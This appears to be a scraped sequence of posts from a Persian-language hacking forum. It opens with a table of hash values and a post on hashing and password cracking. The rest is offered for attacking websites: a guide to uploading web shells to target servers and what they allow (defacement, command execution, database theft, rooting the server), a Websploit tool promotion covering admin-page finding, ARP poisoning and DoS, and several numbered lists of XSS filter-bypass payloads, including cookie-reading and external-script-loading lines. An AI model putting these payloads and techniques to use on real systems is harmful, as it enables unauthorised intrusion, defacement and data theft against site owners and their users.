W8lVIguiNGqUjShI7KN73V7KbsyntZS9MpI/qw== 040 MySQL v5.x: 0d3ced9bec10a777aec23ccc353a8c08a633045e 040 RipeMD160 (HMAC): 8eb208f7e05d987a9b044a8e98c6b087f15a0bfc 040 RipeMD160: 8eb208f7e05d987a9b044a8e98c6b087f15a0bfc 040 SHA-0: 58f00fa5db65ab4ba2551f77d9b575f41a805ae0 040 SHA-1 (HMAC): a9993e364706816aba3e25717850c26c9cd0d89d 040 SHA-1: a9993e364706816aba3e25717850c26c9cd0d89d 040 SHA224 (Base64): Iwl9IjQF2CKGQqR3vaJVsyqtvOS9oLP342ydpw== 040 Tiger160 (HMAC): f258c1e88414ab2a527ab541ffc5b8bf935f7b95 040 Tiger160: f258c1e88414ab2a527ab541ffc5b8bf935f7b95 044 Haval256 (Base64): hpnx4zhNBbKoSwMmk+K29G34WhOlDZOAjWh0u4+56Gw= 044 SHA256 (Base64): ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= 044 SNEFRU256 (Base64): fQMyBWR6KvPcgzn2yyVkPDPrxiLTKXnEthKwLEkDAxs= 048 Haval192 (HMAC): a7b14c9ef3092319b0e75e3b20b957d180bf20745629e8de 048 Haval192: a7b14c9ef3092319b0e75e3b20b957d180bf20745629e8de 048 Haval192_4 e014185fbb9f19faba90dab14c25c34275cdd3e362775c65 048 Haval195_5 f36196ce912fbb5959948043f8248de2a92f74ab4a549b44 048 Tiger192 (HMAC): f258c1e88414ab2a527ab541ffc5b8bf935f7b951c132951 048 Tiger192: f258c1e88414ab2a527ab541ffc5b8bf935f7b951c132951 048 Tiger2 afd7ce60de4799388c88898d708b649d228fc06accecbbb6 056 Haval224 (HMAC): 5bc955220ba2346a948d2848eca37bdd5eca6ecca7b594bd32 923fab 056 Haval224: 5bc955220ba2346a948d2848eca37bdd5eca6ecca7b594bd32 923fab 056 Haval244_3 e29a8c16b58e57ebbfd22ddf169e04ffc0136c3452af19093f c1c4d0 056 Havan244_4 a29f04a725e5a700f1e388239564e5a3d7f22f3020365bf4f9 bc1d36 056 RipeMD320 (Base64): 3kwBswVPiTCnnQmuc46SMB5aFwhb7/3BuNEWcT50+C+pQtZM28RoLQ== 056 SHA224 (HMAC): 23097d223405d8228642a477bda255b32aadbce4bda0b3f7e3 6c9da7 056 SHA224: 23097d223405d8228642a477bda255b32aadbce4bda0b3f7e3 6c9da7 064 Haval256 (HMAC): 8699f1e3384d05b2a84b032693e2b6f46df85a13a50d93808d 6874bb8fb9e86c 064 Haval256: 8699f1e3384d05b2a84b032693e2b6f46df85a13a50d93808d 6874bb8fb9e86c 064 Haval256_3 48ab01f979cf2da92fda1e865ffa315ebb112d1ffe75038089 ef73b4abb181cc 064 Haval256_4 a22c64a107bf9118f8b22470e4daa0e7eb08dbad9f7e4d35dc f409ec40292a75 064 Haval256_5 5b25f8d944429aad67775eec490272dc21ca5631488f227ef5 efd25b30f91a72 064 RipeMD256 (HMAC): afbd6e228b9d8cbbcef5ca2d03e6dba10ac0bc7dcbe4680e1e 42d2e975459b65 064 SHA256 (HMAC): ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb4 10ff61f20015ad 064 SHA256: ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb4 10ff61f20015ad 064 SHA384 (Base64): ywB1P0WjXou1oD1pmsZQBycsMqsO3tFjGotgWkP/W+2AhgcroefMI1i67KE0yCWn 064 SNEFRU256 (HMAC): 7d033205647a2af3dc8339f6cb25643c33ebc622d32979c4b6 12b02c4903031b 064 SNEFRU256: 7d033205647a2af3dc8339f6cb25643c33ebc622d32979c4b6 12b02c4903031b 080 RipeMD320 (HMAC): de4c01b3054f8930a79d09ae738e92301e5a17085beffdc1b8 d116713e74f82fa942d64cdbc4682d 080 RipeMD320: de4c01b3054f8930a79d09ae738e92301e5a17085beffdc1b8 d116713e74f82fa942d64cdbc4682d 088 SHA512 (Base64): 3a81oZNherrMQXNJriBBMRLm+k6JqX6iCp7u5ktV05ohkpkqJ0/BqDa6PCOj/uu9RU1EI2Q86A4qmslPpUyknw== 096 SHA384 (HMAC): cb00753f45a35e8bb5a03d699ac65007272c32ab0eded1631a 8b605a43ff5bed8086072ba1e7cc2358baeca134c825a7 096 SHA384: cb00753f45a35e8bb5a03d699ac65007272c32ab0eded1631a 8b605a43ff5bed8086072ba1e7cc2358baeca134c825a7 128 SHA512 (HMAC): ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a 9eeee64b55d39a2192992a274fc1a8 36ba3c23a3feebbd454d4423643ce80e2a9ac94fa54ca49 f 128 SHA512: ddaf35a193617abacc417349ae20413112e6fa4e89a97ea20a 9eeee64b55d39a2192992a274fc1a8
  41. 1 امتیاز
    هش Hash چیست؟ ( Password Hash ) هش را میتوان اثر انگشت دیجیتالی یک داده نام برد هش نوعی الگوریتم یک طرفه است که با استفاده از فرمول های ریاضی یک متن با طول ثابت رشته ای (fixed length) و با طول کوتاه تولید میکند کشف رشته اصلی از رشته هش آن کاملا غیر ممکن است یا میتوان گفت عملیات معکوس کردن هش کاری غیر ممکن است و هیچگاه عملی نمیشود یعنی هیچگاه نمیتوان از متن یک هش به متن واقعی رسید احتمال یکی شدن داده دو رشته هش متفاوت امکان بذیر نیست و هر داده یک رشته هش مختص به خود و منحصر به فرد دارد و هرگز دو ورودی متفاوت به یک خروجی یکسان منجر نمیشود طبق توضیحات بالا فهمیدیم که الگوریتم های هش معکوس پذیر نیستند و منحصر به فرد هستند یعنی هرگز دو ورودی متفاوت به یک خروجی یکسان منجر نمیشود اگر یکی از این دو خصوصیت نقض شود میگیوییم که الگوریتم شکسته شده.. میتوان کاربردهای زیادی از هش را نام برد که من بخشی کوتاهی از آنها را در توضیح میدهم: در فضای سایبری محافطت ار گذرواژها و انواع پسوردها یکی از دغدغه های متخصصین امنیت محسوب مشود برای جلوگیری از دسترسی نفوذگر(hacker) و یا حداقل سخت کردن کار هکر برای دسترسی به گذرواژه به جای قرار دادن مستقیم گذرواژه (password) ابتدا گذرواژه را با استفاده از انواع الگوریتم مورد نظر هش کرده و سبس در دیتابیس قرار میدهیم. فرض کنید میخواهید فایلی از وبسایت یا شخصی که آشنایی چندانی نسبت به آن ندارید دانلود کنید به این نکته باید توجه داشته باشید که ممکن است فایلی که به شما داده میشود اصل فایل نباشد یا ممکن است فایل دریافتی را نفوذگر آلوده کرده باشد و از طریق آن بتواند از سیستم شما دسترسی بگیرد یا اطلاعات شما را به تاراج ببرد هش اینجا به شما کمک میکند اگر وبسایت حاوی آن فایل یک هش برای فایل مورد نظر در سایت قرار داده باشد شما میتوانید با مشاهده ی و مقایسه ی هش ها از سالم بودن فایل ها اطمینان حاصل فرمایید... آیا هش ها قابل رمزگشایی هستند؟ هرچند الگوریتم هش کردن یک طرفه است اما نفوذگر ها توانسته اند با انجام نوعی حملات brute-force , dictionary attack هش ها را رمزگشایی کنند .برای اینکار آنها تعداد زیادی متن را تبدیل به هش میکنند و هش های حاصل را با هش مورد نظر مقایسه میکنند ،در صورتی که هردو هش یکسان باشند پسورد ها نیز یکسان هستند که در بست های آینده به امید خدا این آموزشها در همین تابیک قرار خواهد گرفت...
  42. 1 امتیاز
    چگونه شل آپلود کنیم؟ از راه های مختلفی میتون شل آپلود کرد بر روی سرور مورد نظر از جمله روش ها میتوان به آنها اشاره کرد : با استفاده از باگ های رایج به نام کاربری و پسورد سایت مورد نظر دسترسی پیدا کنیم و همونطور که میدونید در ۸۰٪ سایت ها ادمین دسترسی کامل برای آپلود هر فایلی را دارد و وقتی وارد پیج ادمین شدید اقدام به اپلود شل میکنید( ممکن است در این راه به مشکل هایی بر بخورید که در اموزش های بعدی نحوه ی دور زدن آپلودر ها یا بایپس کردن آنها برای اپلود شل رو آموزش میدهیم ) مکن است سایت مورد نظر یک پلاگین یا.. اسیب پذیر در سایت خود نصب کرده باشد که این امکان را به ما بدهد که بتوانیم شل آپلود کنیم ( ممکن است در این راه هم به مشکل هایی بر بخورید که در اموزش های بعدی نحوه ی دور زدن آپلودر ها یا بایپس کردن آنها برای اپلود شل رو آموزش میدهیم ) وقتی شل آپلود شد چه میشود؟ وقتی که شل آپلود شد شما به تمام فایل های روی هاست دسترسی کامل دارید و دیفیس کردن اجرای دستورات و سیملینک کردن دانلود فایل ها وصل شدن مشاهده و دانلود دیتابیس روت شدن به سرور نفوذ به دیگر سایت های موجود بر روی سرور و..... انجام دهید که در آموزش های آینده به همه ی این موضوع ها میپردازیم...
  43. 1 امتیاز
    بخش نهم : src="http://www.site.com/XSS.js"></script> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !--" /><script>alert('xss');</script> <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee> <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee> "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee> '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee> <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
  44. 1 امتیاز
    در این بخش آموزش تصویری کار با Websploit رو براتون آماده کردم که از ابزار های قوی و چند کاره هست و یکی از کارهایی که می تونید با این ابزار انجام بدین پیدا کردن صفحه ادمین هست و البته برای کارهای دیگری چون حملات : Arp Poisoning - حملات مردی در میان Dos DDOS - حملات تکذیب سرویس Network Attack - حملات شبکه و... بکار گرفته میشه که انشاا.. در آموزشهای بعدی طرز کار با ماژولهای دیگر این ابزار رو هم بشما آموزش خواهم داد . پسورد فایل : guardiran.org . Admin Login Page Find With Websploit.rar
  45. 1 امتیاز
    درود بخش هفتم: <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out <br size=\"&{alert('XSS')}\"> <scrscriptipt>alert(1)</scrscriptipt> </br style=a:expression(alert())> </script><script>alert(1)</script> "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> [color=red width=expression(alert(123))][color] <BASE HREF="javascript:alert('XSS');//"> Execute(MsgBox(chr(88)&chr(83)&chr(83)))< "></iframe><script>alert(123)</script> <body onLoad="while(true) alert('XSS');"> '"></title><script>alert(1111)</script> </textarea>'"><script>alert(document.cookie)</script> '""><script language="JavaScript"> alert('X \nS \nS');</script>
  46. 1 امتیاز
    بخش ششم: '">><marquee><h1>XSS</h1></marquee> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> <script>var var = 1; alert(var)</script> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <?='<SCRIPT>alert("XSS")</SCRIPT>'?> <IMG SRC='vbscript:msgbox(\"XSS\")'> " onfocus=alert(document.domain) "> <"
  47. 1 امتیاز
    درود بخش پنجم: <div style="x:expression((window.r==1)?'':eval('r=1; alert(String.fromCharCode(88,83,83));'))"> <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> "><script alert(String.fromCharCode(88,83,83))</script> '>><marquee><h1>XSS</h1></marquee> '">><script>alert('XSS')</script>
  48. 1 امتیاز
    بخش چهارم: <img src="javascript:alert('XSS')"> <script language="JavaScript">alert('XSS')</script> <body onunload="javascript:alert('XSS');"> <body onLoad="alert('XSS');" [color=red' onmouseover="alert('xss')"]mouse over[/color] "/></a></><img src=1.gif onerror=alert(1)> window.alert("Bonjour !");
  49. 1 امتیاز
    بخش سوم از سری بایپس های xss <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script> <IMG LOWSRC=\"javascript:alert('XSS')\"> <IMG DYNSRC=\"javascript:alert('XSS')\"> <font style='color:expression(alert(document.cookie))'>
  50. 1 امتیاز
    بخش اول : '';!--"<XSS>=&{()} '>//\\,<'>">">"*" '); alert('XSS <script>alert(1);</script> <script>alert('XSS');</script> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) />